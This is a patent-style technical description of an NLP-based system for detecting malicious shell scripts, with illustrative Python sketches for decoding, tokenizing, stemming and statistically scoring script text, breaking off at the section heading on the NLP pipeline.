System and method for detecting malicious scripts through natural language processing modeling

Description

FIELD

Embodiments of the disclosure relate to cybersecurity. More particularly, one embodiment of the disclosure relates to a system and corresponding method for using natural language processing (NLP) modeling to detect malicious scripts.

GENERAL BACKGROUND

Network devices provide useful and necessary services that assist individuals in business and in their everyday lives. Over the last few years, a growing number of cyberattacks have been conducted on all types of network devices. Some of these cyberattacks are orchestrated in an attempt to gain access to content stored on one or more network devices. Such access is for illicit (i.e., unauthorized) purposes, such as spying or other malicious or nefarious activities. Increasingly, shell scripts are becoming a vector for cyberattacks.

In general terms, a “shell” is an interface to the operating system (OS) kernel (and thus to OS services such as file management, process management, etc.), and may be implemented to operate as a command line interpreter. A “shell script” is a script (computer program) executed by the shell, where the script may include at least one command of the shell interface. While shell scripts are frequently used in legitimate computer operations (e.g., system administration, etc.), there is a growing tendency for malware authors to use shell scripts to mask their malicious intent (e.g., making such scripts appear to execute legitimate tasks). One reason for this growing use of scripts for carrying out cyberattacks centers around scripting flexibility, namely scripts may be coded to support a diverse group of tasks. Thus, it is difficult to discern a script directed to an illegitimate task from a script directed to a legitimate task. Moreover, given the diversity of scripts, it has been difficult to develop signatures to detect malicious scripts. Because of this combination of scripting flexibility and diversity, malware authors using shell scripts are often able to evade detection.

Prior malware detection systems have been configured to detect malicious shell scripts based on manual, human-engineered signatures, which have been difficult to develop and whose effectiveness has been difficult to maintain. In a short amount of time, a script signature may become prone to “false positive” (FP) and/or “false negative” (FN) determinations based on slight changes in the shell script language by the malware author. Also, manual generation of signatures is a slow, inefficient process that fails to adequately support the protection of network devices from an ever-changing threat landscape.

BRIEF DESCRIPTION OF THE DRAWINGS

Embodiments of the disclosure are illustrated by way of example and not by way of limitation in the figures of the accompanying drawings, in which like references indicate similar elements and in which:

FIG. 1 is a first exemplary embodiment of an architecture of an enhanced malware detection system deployed as a software agent operating within a network device.

FIG. 2 is a second exemplary embodiment of an architecture of the enhanced malware detection system deployed as logic within a cybersecurity system.

FIG. 3 is an exemplary embodiment of a Natural Language Processing (NLP) pipeline illustrating operations of the software agent of FIG. 1 or the cybersecurity logic of FIG. 2 based on a command line text input.

FIGS. 4A-4B are illustrative embodiments of a flowchart outlining the operations conducted by the enhanced malware detection system of FIGS. 1-2.

DETAILED DESCRIPTION
I. Overview

Natural language processing is an area of computer science and artificial intelligence concerned with the interactions between computers and human (natural) languages; that is, natural language processing is typically used to analyze human languages. Challenges in natural language processing frequently involve speech recognition, natural language understanding, and natural language generation. Thus far, natural language processing has focused on the analysis of human languages, not computer language analysis.

For this embodiment of the disclosure, highly flexible scripts are analyzed for maliciousness using natural language processing (NLP). As used herein, a “script” may be broadly understood as any computer instructions, commands or other programs (“programming”) written either in (i) an interpreted scripting language (such as Perl, PowerShell, Python, JavaScript, and Tcl, to name a few) and run on a computer via an interpreter, or (ii) in a textual language (such as C++, C#, Java, and Ruby, to name a few) so as to constitute source code that requires compiling to run on a computer. One type of script written in an interpreted language is a shell script, which may be made available to a network device by typing or otherwise entering commands into a command line interface or graphical user interface. Furthermore, the script may be created by malware (post-intrusion) on the endpoint or introduced by an external source such as via a web download or connection of an external storage device. Accordingly, “script” as used herein is intended to encompass the conventional use of that term as well as any other computer programming in human readable form so as to be susceptible to NLP. Where object code (sometimes called binary or executable code) is to be analyzed, that code will need to be subject to pre-processing (e.g., disassembling and decompiling) to produce the source code (i.e., script) version.

As described below, the text associated with each script under analysis (referred to as the “script text”) may undergo tokenization to produce natural (i.e., human) language samples. These natural language samples are referred to as analytic tokens, where an “analytic token” may be defined as an instance of a sequence of characters (i.e., letters, numbers, and/or symbols) that are grouped together as a useful semantic unit for NLP. Thereafter, the script text formed by a plurality of analytic tokens may undergo normalization, which produces normalized script text. Thereafter, a supervised learning model may be applied to the normalized script text in order to classify the script as malicious or benign.

As described below, the supervised learning model utilizing natural language processing functionality (generally referred to as a “NLP model”) may be provided as (i) a machine learning (ML) model of a scripting language utilized by the script and/or (ii) a deep neural network (e.g., recurrent neural network “RNN” or a convolutional neural network “CNN”), which identifies text patterns for the scripting language that are probative of how the script should be classified. Depending on deployment, when the ML model is applied, each analytic token or combination of multiple, neighboring analytic tokens (generally referred to as a “model-adapted token”) is analyzed, using the ML model and a corpus of known malicious software (malware) and known non-malicious software (goodware) tokens, to determine a prediction score for the set of model-adapted tokens. The “prediction score” is a value that represents a likelihood of the set of model-adapted tokens being malicious (i.e., a level of maliciousness). As a result, based on the prediction score, a determination may be made whether the script is malicious or benign.

Similarly, when the deep neural network is applied, each analytic token is analyzed, where the operations of the neural network are pre-trained (conditioned) using training sets of tokens labeled as malicious and/or benign in order to identify which analytic tokens are probative of how the script should be classified. Communicatively coupled to and functioning in concert with the neural network, a classifier, operating in accordance with a set of classification rules, receives an output from the neural network and determines a classification (malicious, benign) assigned to the set of analytic tokens forming the normalized script text.

More specifically, one embodiment of the disclosure is directed to an enhanced malware detection system configured to analyze scripts executing in an environment to determine if the scripts are malicious. Herein, according to this embodiment, the enhanced malware detection system (i) detects a newly active script, (ii) retrieves the script text forming at least part of the script, and (iii) processes the script text (i.e., a collection of words each formed by one or more characters) by performing at least tokenization and normalization operations on the script text.

During tokenization, the script text is segmented into prescribed amounts of text (referred to as “analytic tokens”). The prescribed amounts may be set in accordance with a grid search algorithm, for example. Additionally, any analytic tokens associated with decoded text recovered from an encoded portion of the script text may be tagged (e.g., use of a prefix) in order to signify portions of hidden script text that may warrant heightened scrutiny by the modeling logic (e.g., increased processing time, increased weighting, etc.). The tagging operation may be performed after a stemming operation, being part of the normalization, where the syntax of the script text under analysis is altered and text deemed insignificant in classification of the script is removed to provide a text format that is more easily processed by the modeling logic. The stemming operation may be conducted through a prefix tree to ensure distinctiveness between words being altered as the script text is converted into normalized script text.

Additionally, the enhanced malware detection system analyzes the normalized script text, in particular content associated with the plurality of analytic tokens after normalization, to determine if the script is malicious. For example, the analysis of the normalized script text may be conducted by a ML model which, when applied, selects a set of model-adapted tokens for processing (i.e., each model-adapted token being one or more normalized analytic tokens) and generates a prediction score based on the model-adapted tokens. The prediction score may be weighted and produced as an aggregate of scoring of the model-adapted tokens in determining a verdict for the script. For instance, if the prediction score exceeds a first specified score threshold, the enhanced malware detection system may classify the script as malicious. Similarly, if the prediction score falls below a second specified score threshold, the enhanced malware detection system may classify the script as benign. Lastly, in response to the prediction score falling between the first and second score thresholds, the enhanced malware detection system may classify the script as suspicious and may utilize other analyses in efforts to classify the script.
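The weighted aggregation and two-threshold verdict described above can be illustrated with a minimal sketch. The function names, the weighted-mean aggregation, and the default threshold values (0.8 and 0.2) are assumptions chosen for illustration only; the disclosure does not prescribe particular values or a particular aggregation formula.

```python
from typing import Sequence


def aggregate_score(token_scores: Sequence[float], weights: Sequence[float]) -> float:
    """Combine per-token scores into one prediction score (weighted mean, an assumption)."""
    if not token_scores or len(token_scores) != len(weights):
        raise ValueError("scores and weights must be non-empty and of equal length")
    total_weight = sum(weights)
    if total_weight <= 0:
        raise ValueError("weights must sum to a positive value")
    return sum(s * w for s, w in zip(token_scores, weights)) / total_weight


def classify(prediction_score: float,
             malicious_threshold: float = 0.8,   # hypothetical first threshold
             benign_threshold: float = 0.2) -> str:  # hypothetical second threshold
    """Map a prediction score onto a malicious / benign / suspicious verdict."""
    if benign_threshold > malicious_threshold:
        raise ValueError("benign threshold must not exceed malicious threshold")
    if prediction_score > malicious_threshold:
        return "malicious"
    if prediction_score < benign_threshold:
        return "benign"
    # Scores between the two thresholds are left for other analyses.
    return "suspicious"
```

In this sketch a score exactly equal to either threshold is treated as suspicious, which is one possible reading of "exceeds" and "falls below."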

The NLP model, such as a ML model operating in accordance with NLP functionality, for example, is a statistical language model and provides a probability distribution over a sequence of one or more characters or words (e.g., sequence of multiple characters). The probability distribution is associated with a property, such as maliciousness. According to one embodiment, the NLP model is generated by analyzing a corpus of known malicious and benign scripts (generally referred to as “labeled scripts”) used in training a machine learning classifier to classify a set of model-adapted tokens as malicious or benign. Stated differently, the NLP model may be applied to the normalized script text, namely the plurality of analytic tokens after normalization, which generates a set of model-adapted tokens analyzed to determine a prediction score for each of the set of tokens.

Based on the prediction score (i.e., the likelihood of maliciousness) associated with the normalized script text, the level of maliciousness of the script may be learned. The classification may be determined by comparing the prediction score to one or more specified thresholds (e.g., a first threshold for malicious classification, a second threshold for benign classification, etc.). In response to the script being classified as malicious, the execution of the script may be terminated and/or an alert message (e.g., email message, text message, automated phone call, etc.) may be sent to an administrator. The alert message may be configured to identify the malicious script and provide a description that highlights the model-adapted token or tokens (or analytic token or tokens) demonstrative in the malicious classification and provides the rationale for the classification.

Herein, according to one embodiment of the disclosure, the enhanced malware detection system may be deployed as a module operating within a software agent implemented with a user-operated endpoint. Running in the foreground or background, the agent is configured to identify malicious scripts during normal operation. The agent may include (i) a process monitoring component (hereinafter, “monitoring component”) and (ii) a decoding and analysis component (hereinafter, “DAC component”). The monitoring component is configured to determine when a script is in an active state (e.g., executed, requesting or awaiting execution, etc.). Upon identification, the script (or contents thereof) is provided to the DAC component. The DAC component is configured to process the script and generate a plurality of analytic tokens based on the script. The processing of the suspicious script may include the decoding of portions of the script that have been encoded to obfuscate and/or limit the ability of conventional malware detection systems to determine if the script is malicious. The DAC component is further configured to analyze the plurality of analytic tokens using the NLP model to effectively classify the script under analysis as malicious or benign.

In other embodiments, the functionality of the agent may be integrated into a cybersecurity system, namely a physical network device including a processor, a memory and a virtualized analyzer deployed within a virtualized subsystem that, upon execution, may control operability of one or more virtual machines (VMs) in which the script is tested. The virtualized analyzer may extract scripts from an object received as part of network traffic. The recovered scripts are provided to the one or more VMs to generate a verdict (i.e., malicious or benign). For instance, in some embodiments, the monitoring logic may identify an executing script and provide the identified scripts to remotely located analysis logic, which may reside in the proprietary network or as logic of a public cloud computing service or a private cloud computing service (e.g., private cloud, a virtual private cloud or a hybrid cloud).

II. Terminology

In the following description, certain terminology is used to describe various features of the invention. For example, each of the terms “logic,” “system,” “subsystem,” and “component” may be representative of hardware, firmware or software that is configured to perform one or more functions. As hardware, the term logic (or system or subsystem or component) may include circuitry having data processing and/or storage functionality. Examples of such circuitry may include, but are not limited or restricted to a hardware processor (e.g., microprocessor, one or more processor cores, a digital signal processor, a programmable gate array, a microcontroller, an application specific integrated circuit “ASIC”, etc.), a semiconductor memory, or combinatorial elements.

Additionally, or in the alternative, the logic (or system or subsystem or component) may include software such as one or more processes, one or more instances, Application Programming Interface(s) (API), subroutine(s), function(s), applet(s), servlet(s), routine(s), source code, object code, shared library/dynamic link library (dll), or even one or more instructions. This software may be stored in any type of a suitable non-transitory storage medium, or transitory storage medium (e.g., electrical, optical, acoustical or other form of propagated signals such as carrier waves, infrared signals, or digital signals). Examples of a non-transitory storage medium may include, but are not limited or restricted to a programmable circuit; non-persistent storage such as volatile memory (e.g., any type of random access memory “RAM”); or persistent storage such as non-volatile memory (e.g., read-only memory “ROM”, power-backed RAM, flash memory, phase-change memory, etc.), a solid-state drive, hard disk drive, an optical disc drive, or a portable memory device. As firmware, the logic (or component) may be stored in persistent storage.

The term “object” generally relates to information having a logical structure or organization that enables the object to be classified for purposes of malware analysis. The information may include an executable (e.g., an application, program, code segment, a script, dynamic link library “dll” or any file in a format that can be directly executed by a computer such as a file with an “.exe” extension, etc.), a non-executable (e.g., a file; any document such as a Portable Document Format “PDF” document; a word processing document such as Word® document; an electronic mail “email” message, web page, etc.), or simply a collection of related data (e.g., packets).

The term “computerized” generally represents that any corresponding operations are conducted by hardware in combination with software and/or firmware. The term “data store” generally refers to a data storage device such as the non-transitory storage medium described above, which provides non-persistent or persistent storage for the information (e.g., events). A “character” is broadly defined as a letter, a number, a punctuation, a symbol, or the like. A “sequence of characters” is two or more characters in succession and a “word” is a sequence of characters, which may be defined at both ends by delimiters (e.g., spaces, punctuation, etc.) while a “text” includes a collection of words.

According to one embodiment of the disclosure, the term “malware” may be broadly construed as any code, communication or activity that initiates or furthers a cyberattack. Malware may prompt or cause unauthorized, anomalous, unintended and/or unwanted behaviors or operations constituting a security compromise of information infrastructure. For instance, malware may correspond to a type of malicious computer code that, as an illustrative example, executes an exploit to take advantage of a vulnerability in a network, network device or software, to gain unauthorized access, harm or co-opt operations of the network, the network device or the software, or to misappropriate, modify or delete data. Alternatively, as another illustrative example, malware may correspond to information (e.g., executable code, script(s), data, command(s), etc.) that is designed to cause a network device to experience anomalous (unexpected or undesirable) behaviors. The anomalous behaviors may include a communication-based anomaly or an execution-based anomaly, which, for example, could (1) alter the functionality of a network device executing application software in an unauthorized or malicious manner; (2) alter the functionality of the network device executing that application software without any malicious intent; and/or (3) provide unwanted functionality which may be generally acceptable in another context.

The term “network device” may be construed as hardware and/or software with the capability of connecting to a network. The network may be a public network such as the Internet and/or a local (private) network such as an enterprise network, a wireless local area network (WLAN), a local area network (LAN), a wide area network (WAN), or the like. Examples of a network device may include, but are not limited or restricted to an endpoint (e.g., a laptop, a mobile phone, a tablet, a computer, a video console, a copier, etc.), a network appliance, a server, a router or other intermediary communication device, a firewall, etc.

The term “transmission medium” may be construed as a physical or logical communication path between two or more network devices or between components within a network device. For instance, as a physical communication path, wired and/or wireless interconnects in the form of electrical wiring, optical fiber, cable, bus trace, or a wireless channel using radio frequency (RF) or infrared (IR), may be used. A logical communication path may represent a communication path between two or more network devices or between components within a network device such as one or more Application Programming Interfaces (APIs).

Finally, the terms “or” and “and/or” as used herein are to be interpreted as inclusive or meaning any one or any combination. Therefore, “A, B or C” or “A, B and/or C” mean “any of the following: A; B; C; A and B; A and C; B and C; A, B and C.” An exception to this definition will occur only when a combination of elements, functions, steps or acts are in some way inherently mutually exclusive.

As this invention is susceptible to embodiments of many different forms, it is intended that the present disclosure is to be considered as an example of the principles of the invention and not intended to limit the invention to the specific embodiments shown and described.

III. General Architecture

Referring to FIG. 1, a first exemplary embodiment of an architecture of a network device 100 implemented with an enhanced malware detection system 110 deployed as a software agent operating within the network device 100 is shown. Herein, the network device 100 features a plurality of components 120, including a processor 170, a network interface 175, a non-transitory storage medium (e.g., memory) 180, and an administrative interface 185, which are communicatively coupled together via transmission medium 190. When deployed as a physical network device, the components 120 are at least partially encased in a housing 195 made entirely or partially of a rigid material (e.g., hardened plastic, metal, glass, composite, or any combination thereof). The housing 195 protects these components from environmental conditions. As a virtual device, however, the network device 100 constitutes a compilation of software performing functionality of the enhanced malware detection system 110 and/or functionality of the components 120 such as processor 170, the network interface 175 and the administrative interface 185 for example.

As shown in FIG. 1, according to one embodiment of the disclosure, the software agent 110, operating in the foreground or background, is configured to identify and process text 115 representing a collection of words (e.g., sequences of characters) forming an incoming script 112 (hereinafter, “script text 115”) to predict whether the script 112 is benign or malicious. For example, the script text 115 may include a sequence of multiple sequences of characters representing one or more commands that are to be executed by a shell (not shown), namely an interface to the OS kernel (not separately shown) of operating system 132. The agent 110 may include (i) a process monitoring component (hereinafter, “monitoring component”) 130 and (ii) a decoding and analysis component (hereinafter, “DAC component”) 135.

As described herein, the monitoring component 130 may be configured to detect a script 112 (e.g., shell script) in an active state (e.g., executed, awaiting or requesting execution, etc.). According to one embodiment of the disclosure, the monitoring component 130 detects the script 112 being placed into an active state by monitoring certain processes being executed by the processor 170 within the network device 100. The monitoring component 130 may monitor the processes directly. Alternatively, the monitoring component 130 may monitor the processes indirectly via process tracker logic 134, which is implemented as part of an operating system 132 of the network device 100 and configured to monitor processes involving scripts. Examples of different deployments of the process tracker logic 134 may include, but are not limited to a driver or a handler to monitor certain process calls (e.g., API calls, system calls, etc.). Such operations may be performed in real-time.

Upon detecting the script 112, the monitoring component 130 obtains the script text 115 associated with the script 112 and provides the script text 115 to the DAC component 135. The DAC component 135 is configured to process the script text 115 and generate a set of tokens that are evaluated using a NLP-based modeling logic 160 maintained through supervised learning. Herein, the DAC component 135 includes normalization logic 140, the NLP-based modeling logic 160 and reporting logic 165.

Referring still to FIG. 1, the normalization logic 140 includes decode logic 142, named entity recognition logic 144, tokenization logic 146, stemmer logic 148, vocabulary mapping logic 150, and/or text reconstruction logic 152. Herein, according to one embodiment of the disclosure, the decode logic 142 is configured to recover at least a first text portion of the script text 115 that has been obfuscated (hidden) from analysis by conventional malware detection systems. From the script text 115 itself (e.g., a second portion of the script text 115), the decode logic 142 may be able to determine the encoding used to obfuscate the first (encoded) text portion and decode the first text portion accordingly to produce a non-encoded resultant text (hereinafter, the “decoded text”).
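As one hedged illustration of such decoding, the sketch below handles a single well-known case that the disclosure does not itself name: a PowerShell command line whose -EncodedCommand flag (the "second portion") indicates that the following argument (the "first portion") is Base64-encoded UTF-16LE text. The function name decode_hidden_text and the restriction to the full flag spelling are assumptions made for brevity.

```python
import base64
import re
from typing import List

# Assumption: only the full "-EncodedCommand" spelling is recognized here.
ENCODED_COMMAND_RE = re.compile(r"-EncodedCommand\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_hidden_text(script_text: str) -> List[str]:
    """Return the decoded text for each Base64 payload flagged in the script text."""
    decoded_portions = []
    for payload in ENCODED_COMMAND_RE.findall(script_text):
        try:
            raw = base64.b64decode(payload, validate=True)
            decoded_portions.append(raw.decode("utf-16-le"))
        except ValueError:
            # Not valid Base64 or not valid UTF-16LE: leave this portion undecoded.
            continue
    return decoded_portions
```

A fuller decoder would likely support several encodings and nested layers; this sketch only shows how a hint in the visible text can select the decoding applied to the hidden text.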

As further shown in FIG. 1, the named entity recognition logic 144 is configured to analyze the decoded text to at least determine whether a particular source or target of the script (e.g., domain name, host or email address, registry key, filename, etc.) is listed within the decoded text, and if so, utilize such information for subsequent analysis. For instance, a certain domain may identify a geographic location in which the script originated. The geographic location may provide additional evidence in determining whether the script is malicious or benign.
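A minimal sketch of this kind of entity extraction is shown below using regular expressions. The patterns, the function name extract_entities, and the three entity categories returned are illustrative assumptions; they are far simpler than a production named entity recognizer and are not taken from the disclosure.

```python
import re
from typing import Dict, List

# Simplified, hypothetical patterns for three of the entity types mentioned above.
EMAIL_RE = re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b")
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
REGISTRY_RE = re.compile(r"\b(?:HKLM|HKCU|HKEY_[A-Z_]+)\\[^\s;]+")


def extract_entities(decoded_text: str) -> Dict[str, List[str]]:
    """Collect hosts, email addresses and registry keys named in the decoded text."""
    return {
        "hosts": URL_HOST_RE.findall(decoded_text),
        "emails": EMAIL_RE.findall(decoded_text),
        "registry_keys": REGISTRY_RE.findall(decoded_text),
    }
```

The extracted hosts could then be passed to a separate lookup (for example, a geolocation or reputation service) to supply the additional evidence described above.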

Furthermore, according to this embodiment, the tokenization logic 146 is configured to segment the decoded text of the script into smaller units (generally referred to as “analytic tokens”) for subsequent analysis by the NLP-based modeling logic 160. The size of the analytic tokens may be preset or selected based on the grid search technique, as described below. Furthermore, the analytic tokens associated with the first text portion of the script text 115 are tagged to identify that such content was initially hidden. The encoding of the content may indicate that malware was attempting to evade detection. Such tagging may be accomplished by either (i) assigning a prefix to each analytic token being the decoded text from the first (encoded) text portion of the script text 115 or (ii) maintaining a pointer or tag to each of these “hidden” analytic tokens. This tagging may be utilized by the NLP-based modeling logic 160 to conduct a higher scrutiny analysis of the tagged analytic tokens. However, depending on the deployment, the tagging of the analytic tokens may occur after operations by the stemmer logic 148.
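The prefix-based tagging option may be sketched as follows. The word-or-symbol token pattern, the function name tokenize, and the "HIDDEN_" prefix are assumptions for illustration; the disclosure leaves the token size and the tag format open.

```python
import re
from typing import List

# Assumption: a token is either a run of word characters or a single symbol.
TOKEN_RE = re.compile(r"[A-Za-z0-9_]+|[^\sA-Za-z0-9_]")


def tokenize(visible_text: str,
             decoded_hidden_text: str = "",
             hidden_prefix: str = "HIDDEN_") -> List[str]:
    """Segment text into analytic tokens, prefixing tokens recovered from encoded text."""
    tokens = TOKEN_RE.findall(visible_text)
    # Tokens that came from the decoded (initially hidden) portion are tagged.
    tokens += [hidden_prefix + tok for tok in TOKEN_RE.findall(decoded_hidden_text)]
    return tokens
```

Because the tag is part of the token string itself, a downstream model treats "HIDDEN_IEX" and "IEX" as distinct features and can weight them differently.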

The stemmer logic 148 is configured to alter the syntax of the decoded text (i.e., analytic tokens) to a different syntax. In particular, the stemmer logic 148 may substitute one or more words or characters within the decoded text for other word(s) or character(s), which places the decoded text into a simpler syntax. In some cases, the simpler syntax may result in a lesser number of characters than provided by the decoded text. For example, the stemmer logic 148 can be implemented using a prefix tree, in which case the words “Execute” or “Encode” within the script may be stemmed by the prefix tree into “Ex” and “En”. The syntax change is conducted to improve efficiency in processing of the analytic tokens by the NLP-based modeling logic 160. Moreover, by placing the decoded text into the simpler syntax, the agent may mitigate an attempt by a malware author to circumvent malware detection by slightly changing text within a version of the script 112 (e.g., through letter-case variation alone, “Execute” may be written 2^7 (i.e., 128) different ways, such as “Execute,” “execute,” “eXecute,” “EXecute,” etc.).
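One way a prefix tree could yield such stems is to map each known word to its shortest prefix that no other known word shares. The sketch below follows that interpretation, which is an assumption rather than the disclosed implementation; it also folds letter case before stemming, so the stems come out as "ex" and "en" rather than "Ex" and "En". The class and function names are hypothetical.

```python
from typing import Callable, Dict, Iterable


class PrefixTree:
    """Trie node that counts how many inserted words pass through it."""

    def __init__(self) -> None:
        self.children: Dict[str, "PrefixTree"] = {}
        self.count = 0

    def insert(self, word: str) -> None:
        node = self
        for ch in word:
            node = node.children.setdefault(ch, PrefixTree())
            node.count += 1

    def shortest_unique_prefix(self, word: str) -> str:
        node = self
        for length, ch in enumerate(word, start=1):
            child = node.children.get(ch)
            if child is None:
                return word  # unknown word: leave it unchanged
            if child.count == 1:
                return word[:length]  # no other known word shares this prefix
            node = child
        return word


def build_stemmer(known_words: Iterable[str]) -> Callable[[str], str]:
    """Build a case-insensitive stemmer from a list of known words."""
    tree = PrefixTree()
    for word in {w.lower() for w in known_words}:  # de-duplicate after case folding
        tree.insert(word)
    return lambda token: tree.shortest_unique_prefix(token.lower())
```

With the known words "Execute" and "Encode", every letter-case variant of "Execute" collapses to the same short stem, which is the property the passage above relies on.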

The vocabulary mapping logic 150 promotes words (e.g., a sequence of characters) into a vocabulary data store 155 that maintains words associated with different scripts that have been determined to have a predetermined level of significance in the classification of scripts and/or tokens associated with the scripts. One technique for establishing a level of significance for a word (sequence of characters) is based on repetitive occurrence of a word within a script, where extremely frequent occurrences or rare occurrences of the word denote lesser significance than words with intermediary frequency. An example of the technique includes term frequency-inverse document frequency (tf-idf).
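A small tf-idf-based selection can be sketched as follows. Plain tf-idf already suppresses words that occur in every script (their inverse document frequency is zero); the additional minimum document frequency used here to suppress rare words, along with the function name and default parameters, is an assumption added for illustration.

```python
import math
from collections import Counter
from typing import List, Set


def build_vocabulary(documents: List[List[str]],
                     min_df: int = 2,          # hypothetical rarity cut-off
                     min_score: float = 0.0) -> Set[str]:
    """Select words whose tf-idf exceeds min_score in at least one tokenized script."""
    n_docs = len(documents)
    # Document frequency: number of scripts in which each word appears.
    doc_freq = Counter(word for doc in documents for word in set(doc))
    vocabulary: Set[str] = set()
    for doc in documents:
        if not doc:
            continue
        for word, count in Counter(doc).items():
            if doc_freq[word] < min_df:
                continue  # too rare to be considered significant
            tf = count / len(doc)
            idf = math.log(n_docs / doc_freq[word])  # zero when the word is in every script
            if tf * idf > min_score:
                vocabulary.add(word)
    return vocabulary
```

In a three-script corpus where "get" appears everywhere, "run" appears in two scripts, and the remaining words appear once each, only "run" is promoted into the vocabulary.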

Lastly, the text reconstruction logic 152 reconstructs the decoded text of the script 112 using only words in the vocabulary data store 155. The text reconstruction logic 152 produces normalized script text (see text 355 of FIG. 3) to be processed by the NLP-based modeling logic 160.

The NLP-based modeling logic 160 performs a statistical language modeling scheme that is applied to the normalized script text, namely the analytic tokens produced by the tokenization logic 146, to generate a set of tokens (hereinafter, “model-adapted tokens”) for correlation with tokens associated with a corpus of known malicious and/or known benign scripts. This correlation may be conducted by a classifier with a machine learning (ML) model (or a deep neural network) operating as the NLP model 162 for example. The NLP model 162 assigns a prediction score to the set of model-adapted tokens forming the normalized script text, which may be used to determine if the script 112 is malicious.
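The following sketch illustrates one simple statistical language model of this kind: model-adapted tokens are formed as n-grams of neighboring analytic tokens, and a naive Bayes style log-odds score with add-one smoothing is converted into a prediction score between 0 and 1. The choice of naive Bayes, equal class priors, the class name NGramScorer, and the clamping constant are all assumptions; the disclosure does not limit the NLP model 162 to this form.

```python
import math
from collections import Counter
from typing import List


def ngrams(tokens: List[str], n_max: int = 2) -> List[str]:
    """Form model-adapted tokens: every run of 1..n_max neighboring analytic tokens."""
    return [" ".join(tokens[i:i + n])
            for n in range(1, n_max + 1)
            for i in range(len(tokens) - n + 1)]


class NGramScorer:
    """Naive Bayes style scorer trained on labeled, tokenized scripts (equal priors assumed)."""

    def __init__(self, malicious_docs: List[List[str]],
                 benign_docs: List[List[str]], n_max: int = 2) -> None:
        self.n_max = n_max
        self.mal = Counter(g for d in malicious_docs for g in ngrams(d, n_max))
        self.ben = Counter(g for d in benign_docs for g in ngrams(d, n_max))
        self.vocab_size = len(set(self.mal) | set(self.ben))
        if self.vocab_size == 0:
            raise ValueError("training corpus must contain at least one token")
        self.mal_total = sum(self.mal.values())
        self.ben_total = sum(self.ben.values())

    def prediction_score(self, tokens: List[str]) -> float:
        log_odds = 0.0
        for gram in ngrams(tokens, self.n_max):
            # Add-one smoothing keeps unseen n-grams from producing zero probabilities.
            p_mal = (self.mal[gram] + 1) / (self.mal_total + self.vocab_size)
            p_ben = (self.ben[gram] + 1) / (self.ben_total + self.vocab_size)
            log_odds += math.log(p_mal / p_ben)
        log_odds = max(-50.0, min(50.0, log_odds))  # clamp to avoid overflow in exp
        return 1.0 / (1.0 + math.exp(-log_odds))
```

A score above 0.5 indicates that the n-grams in the script are, on balance, more typical of the malicious corpus than of the benign corpus.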

The reporting logic 165 is adapted to generate a description 166 that identifies the model-adapted token or tokens that were demonstrative in predicting the classification of the script 112 (i.e., benign or malicious) and represents the model-adapted token or tokens as the rationale for the assigned classification. The reporting logic 165 relates the description 166 with the stored model-adapted token(s) 167 identified in the description 166 for inclusion in an alert message 168, which is directed (e.g., transmitted) to an administrator responsible for the network device 100 and/or a network to which the network device 100 is connected.
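As a hedged illustration of such reporting, the sketch below ranks model-adapted tokens by the magnitude of a per-token contribution value and places the top-ranked tokens in a textual description. The Alert structure, the build_alert function, and the notion of a numeric per-token contribution are assumptions introduced here; the disclosure does not specify how demonstrative tokens are selected.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Alert:
    script_id: str
    verdict: str
    description: str
    tokens: List[str]


def build_alert(script_id: str, verdict: str,
                contributions: Dict[str, float], top_k: int = 3) -> Alert:
    """Describe a verdict by naming the tokens with the largest absolute contribution."""
    ranked = sorted(contributions.items(), key=lambda item: abs(item[1]), reverse=True)
    tokens = [token for token, _ in ranked[:top_k]]
    description = (f"Script {script_id} classified as {verdict}; "
                   f"most influential tokens: {', '.join(tokens)}")
    return Alert(script_id=script_id, verdict=verdict,
                 description=description, tokens=tokens)
```

The resulting object could then be serialized into an email, text message, or other alert channel of the kind described above.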

Referring still to FIG. 1, the processor 170 includes one or more multi-purpose, programmable components that accept digital information as input, process the digital information according to stored instructions, and provide results as output. One example of a processor may include an Intel® central processing unit (CPU) with an x86 instruction set architecture. Alternatively, the processor 170 may include another type of CPU, a digital signal processor (DSP), an Application Specific Integrated Circuit (ASIC), a field-programmable gate array (FPGA), or the like.

The processor 170 is communicatively coupled to the memory 180 via the transmission medium 190. According to one embodiment of the disclosure, the memory 180 is adapted to store (i) the monitoring component 130 (described above), (ii) the DAC component 135 (described above), and/or (iii) any portion thereof. The administrative interface 185 is a portal that allows an administrator, after credential exchange and authentication, to access and update logic stored within the memory 180 of the network device 100. For instance, the administrative interface 185 may include authentication logic (not shown) to authenticate an administrator requesting access to stored logic within the network device 100. Upon authentication, the administrator is able to modify (i) rules that control operability of the monitoring component 130, (ii) portions of the normalization logic 140 (e.g., add new decoder, change tokenization logic 146, change stemmer logic 148, or the like), and/or (iii) NLP model functionality.

Referring now to FIG. 2, an exemplary block diagram of a physical representation of a cybersecurity system 200 is shown. Similar to the architecture of the components included as part of the network device 100 of FIG. 1, the cybersecurity system 200 features a plurality of components 210, including a processor 220, a network interface 225, a memory 230, and an administrative interface 235, which are communicatively coupled together via a transmission medium 240. As shown, when deployed as a physical network device, the cybersecurity system 200 includes the components 210 at least partially encased in a housing 250. As a virtual device, however, the cybersecurity system 200 is deployed as logic, where some or all of the logic, provided as the components 210, is stored within the memory 230.

Herein, the processor 220 and an operating system (OS) 260 including the process tracker logic 134, which is maintained within the memory 230, operate as system resources for a virtualized subsystem 265, including one or more virtual machine instances 270 (e.g., a first VM). The first VM 270 is configured to analyze an incoming object 275. During processing of the object 275 within the VM 270 of the virtualized subsystem 265, the monitoring component 130 detects execution of the script 112 and the DAC component 135 performs the NLP processing of the script text 115 within the first VM 270 in a similar manner as described above.

Herein, the cybersecurity system 200 may be deployed on-premises (e.g., as an edge device for the local network, a network device with an interior coupling to the local network, etc.) to detect and analyze objects including scripts propagating into or through the local network. Alternatively, although not shown, the cybersecurity system 200 may be deployed as a cloud-based solution in which the script 112 is captured at or within the local network and submitted to a cloud-based cybersecurity system 200 to handle the analysis of the script 112, thereby leveraging deep neural networks for handling the NLP modeling, as described below.

IV. NLP Pipeline Operability

